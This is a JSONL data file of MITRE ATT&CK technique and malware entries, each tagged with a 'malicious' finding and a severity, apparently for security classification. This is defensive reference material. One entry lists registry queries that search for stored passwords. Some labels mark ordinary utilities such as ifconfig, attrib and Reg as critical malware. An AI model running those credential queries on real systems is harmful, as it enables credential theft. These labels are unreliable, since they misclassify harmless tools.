{"id": "mitre_00060", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Print Processors\n\nTechnique: T1547.012\nTactics: persistence, privilege-escalation\nPlatforms: Windows\n\nAdversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, `spoolsv.exe`, during boot.(Citation: Microsoft Intro Print Processors)\n\nAdversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the AddPrintProcessor API call with an account that has SeLoadDriverPrivilege enabled. Alternatively, a print processor can be registered to the print spooler service by adding the HKLM\\SYSTEM\\\\[CurrentControlSet or ControlSet001]\\Control\\Print\\Environments\\\\[Windows architecture: e.g., Windows x64]\\Print Processors\\\\[user defined]\\Driver Registry key that points to the DLL.\n\nFor the malicious print processor to be correctly installed, the payload must be located in the dedicated system print-processor directory, that can be found with the GetPrintProcessorDirectory API call, or referenced via a relative path from this directory.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020)\n\nThe print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1547.012", "technique_name": "Print Processors", "tactics": ["persistence", "privilege-escalation"]}}]}
{"id": "mitre_00061", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Runtime Data Manipulation\n\nTechnique: T1565.003\nTactics: impact\nPlatforms: Linux, macOS, Windows\n\nAdversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nAdversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1565.003", "technique_name": "Runtime Data Manipulation", "tactics": ["impact"]}}]}
{"id": "mitre_00062", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Native API\n\nTechnique: T1106\nTactics: execution\nPlatforms: Linux, macOS, Windows\n\nAdversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\n\nAdversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system.\n\nNative API functions (such as NtCreateProcess) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.(Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)\n\nHigher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)\n\nAdversaries may use assembly to directly or in-directly invoke syscalls in an attempt to subvert defensive sensors and detection signatures such as user mode API-hooks.(Citation: Redops Syscalls) Adversaries may also attempt to tamper with sensors and defensive tools associated with API monitoring, such as unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001).", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1106", "technique_name": "Native API", "tactics": ["execution"]}}]}
{"id": "mitre_00063", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Kinsing\n\nType: malware\nPlatforms: Containers, Linux\n\n[Kinsing](https://attack.mitre.org/software/S0599) is Golang-based malware that runs a cryptocurrency miner and attempts to spread itself to other hosts in the victim environment. (Citation: Aqua Kinsing April 2020)(Citation: Sysdig Kinsing November 2020)(Citation: Aqua Security Cloud Native Threat Report June 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Kinsing", "malware_type": "malware"}}]}
{"id": "mitre_00064", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# WIREFIRE\n\nType: malware\nPlatforms: Network Devices\n\n[WIREFIRE](https://attack.mitre.org/software/S1115) is a web shell written in Python that exists as trojanized logic to the visits.py component of Ivanti Connect Secure VPN appliances. [WIREFIRE](https://attack.mitre.org/software/S1115) was used during [Cutting Edge](https://attack.mitre.org/campaigns/C0029) for downloading files and command execution.(Citation: Mandiant Cutting Edge January 2024)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "WIREFIRE", "malware_type": "malware"}}]}
{"id": "mitre_00065", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Invalid Code Signature\n\nTechnique: T1036.001\nTactics: defense-evasion\nPlatforms: Windows, macOS\n\nAdversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)\n\nUnlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1036.001", "technique_name": "Invalid Code Signature", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00066", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# PowGoop\n\nType: malware\nPlatforms: Windows\n\n[PowGoop](https://attack.mitre.org/software/S1046) is a loader that consists of a DLL loader and a PowerShell-based downloader; it has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) as their main loader.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: CYBERCOM Iranian Intel Cyber January 2022)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "PowGoop", "malware_type": "malware"}}]}
{"id": "mitre_00067", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# ifconfig\n\nType: tool\n\n[ifconfig](https://attack.mitre.org/software/S0101) is a Unix-based utility used to gather information about and interact with the TCP/IP settings on a system. (Citation: Wikipedia Ifconfig)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "ifconfig", "malware_type": "tool"}}]}
{"id": "mitre_00068", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Reg\n\nType: tool\nPlatforms: Windows\n\n[Reg](https://attack.mitre.org/software/S0075) is a Windows utility used to interact with the Windows Registry. It can be used at the command-line interface to query, add, modify, and remove information. (Citation: Microsoft Reg)\n\nUtilities such as [Reg](https://attack.mitre.org/software/S0075) are known to be used by persistent threats. (Citation: Windows Commands JPCERT)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Reg", "malware_type": "tool"}}]}
{"id": "mitre_00069", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# OS Credential Dumping\n\nTechnique: T1003\nTactics: credential-access\nPlatforms: Linux, macOS, Windows\n\nAdversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.\n\nSeveral of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.\n", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1003", "technique_name": "OS Credential Dumping", "tactics": ["credential-access"]}}]}
{"id": "mitre_00070", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# HTRAN\n\nType: tool\nPlatforms: Linux, Windows\n\n[HTRAN](https://attack.mitre.org/software/S0040) is a tool that proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks. (Citation: Operation Quantum Entanglement)(Citation: NCSC Joint Report Public Tools)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "HTRAN", "malware_type": "tool"}}]}
{"id": "mitre_00071", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Disable or Modify Linux Audit System\n\nTechnique: T1562.012\nTactics: defense-evasion\nPlatforms: Linux\n\nAdversaries may disable or modify the Linux audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel-level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules.\n\nOften referred to as `auditd`, this is the name of the daemon used to write events to disk and is governed by the parameters set in the `audit.conf` configuration file. Two primary ways to configure the log generation rules are through the command line `auditctl` utility and the file `/etc/audit/audit.rules`, containing a sequence of `auditctl` commands loaded at boot time.(Citation: Red Hat System Auditing)(Citation: IzyKnows auditd threat detection 2022)\n\nWith root privileges, adversaries may be able to ensure their activity is not logged through disabling the Audit system service, editing the configuration/rule files, or by hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service through killing processes associated with `auditd` daemon or use `systemctl` to stop the Audit service. Adversaries can also hook Audit system functions to disable logging or modify the rules contained in the `/etc/audit/audit.rules` or `audit.conf` files to ignore malicious activity.(Citation: Trustwave Honeypot SkidMap 2023)(Citation: ESET Ebury Feb 2014)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1562.012", "technique_name": "Disable or Modify Linux Audit System", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00072", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# BOOKWORM\n\nType: malware\nPlatforms: Windows\n\n[BOOKWORM](https://attack.mitre.org/software/S1226) is a modular trojan known to be leveraged by [Mustang Panda](https://attack.mitre.org/groups/G0129) and was first observed utilized in 2015. [BOOKWORM](https://attack.mitre.org/software/S1226) was later updated in late 2021 and the fall of 2022 to launch shellcode represented as UUID parameters. (Citation: Broadcom)(Citation: Unit42 Bookworm Nov2015)(Citation: Palo Alto Networks, Unit 42)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "BOOKWORM", "malware_type": "malware"}}]}
{"id": "mitre_00073", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Remote Email Collection\n\nTechnique: T1114.002\nTactics: collection\nPlatforms: Windows, Office Suite\n\nAdversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific keywords.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1114.002", "technique_name": "Remote Email Collection", "tactics": ["collection"]}}]}
{"id": "mitre_00074", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# TDTESS\n\nType: malware\nPlatforms: Windows\n\n[TDTESS](https://attack.mitre.org/software/S0164) is a 64-bit .NET binary backdoor used by [CopyKittens](https://attack.mitre.org/groups/G0052). (Citation: ClearSky Wilted Tulip July 2017)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "TDTESS", "malware_type": "malware"}}]}
{"id": "mitre_00075", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Credentials in Registry\n\nTechnique: T1552.002\nTactics: credential-access\nPlatforms: Windows\n\nAdversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.\n\nExample commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)\n\n* Local Machine Hive: reg query HKLM /f password /t REG_SZ /s\n* Current User Hive: reg query HKCU /f password /t REG_SZ /s", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1552.002", "technique_name": "Credentials in Registry", "tactics": ["credential-access"]}}]}
{"id": "mitre_00076", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# attrib\n\nType: tool\nPlatforms: Windows\n\n[attrib](https://attack.mitre.org/software/S1176) is a Windows utility used to display, set or remove attributes assigned to files or directories.(Citation: Microsoft attrib 2023) ", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "attrib", "malware_type": "tool"}}]}
{"id": "mitre_00077", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Dynamic Resolution\n\nTechnique: T1568\nTactics: command-and-control\nPlatforms: Linux, macOS, Windows, ESXi\n\nAdversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.\n\nAdversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1568", "technique_name": "Dynamic Resolution", "tactics": ["command-and-control"]}}]}
{"id": "mitre_00078", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Shortcut Modification\n\nTechnique: T1547.009\nTactics: persistence, privilege-escalation\nPlatforms: Windows\n\nAdversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.\n\nAdversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.(Citation: Shortcut for Persistence ) Although often used as payloads in an infection chain (e.g. [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)), adversaries may also create a new shortcut as a means of indirection, while also abusing [Masquerading](https://attack.mitre.org/techniques/T1036) to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program.\n\nShortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. [Browser Extensions](https://attack.mitre.org/techniques/T1176/001)) to persistently launch malware.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1547.009", "technique_name": "Shortcut Modification", "tactics": ["persistence", "privilege-escalation"]}}]}
{"id": "mitre_00079", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Taint Shared Content\n\nTechnique: T1080\nTactics: lateral-movement\nPlatforms: Windows, SaaS, Linux, macOS, Office Suite\n\n\nAdversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.\n\nA directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)\n\nAdversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1080", "technique_name": "Taint Shared Content", "tactics": ["lateral-movement"]}}]}
{"id": "mitre_00080", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Network Denial of Service\n\nTechnique: T1498\nTactics: impact\nPlatforms: Windows, IaaS, Linux, macOS, Containers\n\nAdversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)\n\nA Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\n\nTo perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets.\n\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\n\nFor DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499).", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1498", "technique_name": "Network Denial of Service", "tactics": ["impact"]}}]}
{"id": "mitre_00081", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Compression\n\nTechnique: T1027.015\nTactics: defense-evasion\nPlatforms: Linux, Windows, macOS\n\nAdversaries may use compression to obfuscate their payloads or files. Compressed file formats such as ZIP, gzip, 7z, and RAR can compress and archive multiple files together to make it easier and faster to transfer files. In addition to compressing files, adversaries may also compress shellcode directly - for example, in order to store it in a Windows Registry key (i.e., [Fileless Storage](https://attack.mitre.org/techniques/T1027/011)).(Citation: Trustwave Pillowmint June 2020)\n\nIn order to further evade detection, adversaries may combine multiple ZIP files into one archive. This process of concatenation creates an archive that appears to be a single archive but in fact contains the central directories of the embedded archives. Some ZIP readers, such as 7zip, may not be able to identify concatenated ZIP files and miss the presence of the malicious payload.(Citation: Perception Point)\n\nFile archives may be sent as one [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) through email. Adversaries have sent malicious payloads as archived files to encourage the user to interact with and extract the malicious payload onto their system (i.e., [Malicious File](https://attack.mitre.org/techniques/T1204/002)).(Citation: NTT Security Flagpro new December 2021) However, some file compression tools, such as 7zip, can be used to produce self-extracting archives. Adversaries may send self-extracting archives to hide the functionality of their payload and launch it without requiring multiple actions from the user.(Citation: The Hacker News)\n\n[Compression](https://attack.mitre.org/techniques/T1027/015) may be used in combination with [Encrypted/Encoded File](https://attack.mitre.org/techniques/T1027/013) where compressed files are encrypted and password-protected.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1027.015", "technique_name": "Compression", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00082", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# OnionDuke\n\nType: malware\nPlatforms: Windows\n\n[OnionDuke](https://attack.mitre.org/software/S0052) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2013 to 2015. (Citation: F-Secure The Dukes)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "OnionDuke", "malware_type": "malware"}}]}
{"id": "mitre_00083", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Winnti for Windows\n\nType: malware\nPlatforms: Windows\n\n[Winnti for Windows](https://attack.mitre.org/software/S0141) is a modular remote access Trojan (RAT) that has been used likely by multiple groups to carry out intrusions in various regions since at least 2010, including by one group referred to as the same name, [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: Kaspersky Winnti April 2013)(Citation: Microsoft Winnti Jan 2017)(Citation: Novetta Winnti April 2015)(Citation: 401 TRG Winnti Umbrella May 2018). The Linux variant is tracked separately under [Winnti for Linux](https://attack.mitre.org/software/S0430).(Citation: Chronicle Winnti for Linux May 2019)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Winnti for Windows", "malware_type": "malware"}}]}
{"id": "mitre_00084", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Avenger\n\nType: malware\nPlatforms: Windows\n\n[Avenger](https://attack.mitre.org/software/S0473) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Avenger", "malware_type": "malware"}}]}
{"id": "mitre_00085", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# BONDUPDATER\n\nType: malware\nPlatforms: Windows\n\n[BONDUPDATER](https://attack.mitre.org/software/S0360) is a PowerShell backdoor used by [OilRig](https://attack.mitre.org/groups/G0049). It was first observed in November 2017 during targeting of a Middle Eastern government organization, and an updated version was observed in August 2018 being used to target a government organization with spearphishing emails.(Citation: FireEye APT34 Dec 2017)(Citation: Palo Alto OilRig Sep 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "BONDUPDATER", "malware_type": "malware"}}]}
{"id": "mitre_00086", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Search Engines\n\nTechnique: T1593.002\nTactics: reconnaissance\nPlatforms: PRE\n\nAdversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)\n\nAdversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)).", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1593.002", "technique_name": "Search Engines", "tactics": ["reconnaissance"]}}]}
{"id": "mitre_00087", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# DarkGate\n\nType: malware\nPlatforms: Windows\n\n[DarkGate](https://attack.mitre.org/software/S1111) first emerged in 2018 and has evolved into an initial access and data gathering tool associated with various criminal cyber operations. Written in Delphi and named \"DarkGate\" by its author, [DarkGate](https://attack.mitre.org/software/S1111) is associated with credential theft, cryptomining, cryptotheft, and pre-ransomware actions.(Citation: Ensilo Darkgate 2018) DarkGate use increased significantly starting in 2022 and is under active development by its author, who provides it as a Malware-as-a-Service offering.(Citation: Trellix Darkgate 2023)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "DarkGate", "malware_type": "malware"}}]}
{"id": "mitre_00088", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# TSCookie\n\nType: malware\nPlatforms: Windows\n\n[TSCookie](https://attack.mitre.org/software/S0436) is a remote access tool (RAT) that has been used by [BlackTech](https://attack.mitre.org/groups/G0098) in campaigns against Japanese targets.(Citation: JPCert TSCookie March 2018)(Citation: JPCert BlackTech Malware September 2019). [TSCookie](https://attack.mitre.org/software/S0436) has been referred to as [PLEAD](https://attack.mitre.org/software/S0435) though more recent reporting indicates a separation between the two.(Citation: JPCert PLEAD Downloader June 2018)(Citation: JPCert BlackTech Malware September 2019)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "TSCookie", "malware_type": "malware"}}]}
{"id": "mitre_00089", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Process Doppelg\u00e4nging\n\nTechnique: T1055.013\nTactics: defense-evasion, privilege-escalation\nPlatforms: Windows\n\nAdversaries may inject malicious code into process via process doppelg\u00e4nging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelg\u00e4nging is a method of executing arbitrary code in the address space of a separate live process. \n\nWindows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)\n\nAlthough deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017)\n\nAdversaries may abuse TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), process doppelg\u00e4nging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelg\u00e4nging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017)\n\nProcess Doppelg\u00e4nging is implemented in 4 steps (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017):\n\n* Transact \u2013 Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.\n* Load \u2013 Create a shared section of memory and load the malicious executable.\n* Rollback \u2013 Undo changes to original executable, effectively removing malicious code from the file system.\n* Animate \u2013 Create a process from the tainted section of memory and initiate execution.\n\nThis behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelg\u00e4nging may evade detection from security products since the execution is masked under a legitimate process. ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1055.013", "technique_name": "Process Doppelg\u00e4nging", "tactics": ["defense-evasion", "privilege-escalation"]}}]}
{"id": "mitre_00090", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# njRAT\n\nType: malware\nPlatforms: Windows\n\n[njRAT](https://attack.mitre.org/software/S0385) is a remote access tool (RAT) that was first observed in 2012. It has been used by threat actors in the Middle East.(Citation: Fidelis njRAT June 2013)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "njRAT", "malware_type": "malware"}}]}
{"id": "mitre_00091", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# OceanSalt\n\nType: malware\nPlatforms: Windows\n\n[OceanSalt](https://attack.mitre.org/software/S0346) is a Trojan that was used in a campaign targeting victims in South Korea, United States, and Canada. [OceanSalt](https://attack.mitre.org/software/S0346) shares code similarity with [SpyNote RAT](https://attack.mitre.org/software/S0305), which has been linked to [APT1](https://attack.mitre.org/groups/G0006).(Citation: McAfee Oceansalt Oct 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "OceanSalt", "malware_type": "malware"}}]}
{"id": "mitre_00092", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Data from Configuration Repository\n\nTechnique: T1602\nTactics: collection\nPlatforms: Network Devices\n\nAdversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.\n\nAdversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1602", "technique_name": "Data from Configuration Repository", "tactics": ["collection"]}}]}
